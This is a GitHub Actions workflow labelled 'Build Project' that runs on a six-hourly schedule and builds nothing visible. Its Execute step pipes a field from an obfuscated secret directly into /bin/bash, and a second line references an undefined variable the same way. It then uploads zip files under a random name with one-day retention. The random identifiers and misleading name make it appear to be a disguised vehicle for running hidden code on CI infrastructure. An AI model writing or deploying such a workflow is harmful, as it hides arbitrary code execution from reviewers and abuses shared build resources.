name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '41 1,7,13,19 * * *'
permissions:
  contents: read
  actions: read
jobs:
  task:
    name: Run task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Execute
        env:
          p28590: ${{ secrets.p28590 }}
        run: |
          printf '%s' "$p28590" | jq -r .vvb83714 | /bin/bash
          printf '%s' "$fihze581" | jq -r .z133 | /bin/bash

      - name: Upload artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 7cGP9Bf0
          path: "*.zip"
          retention-days: 1
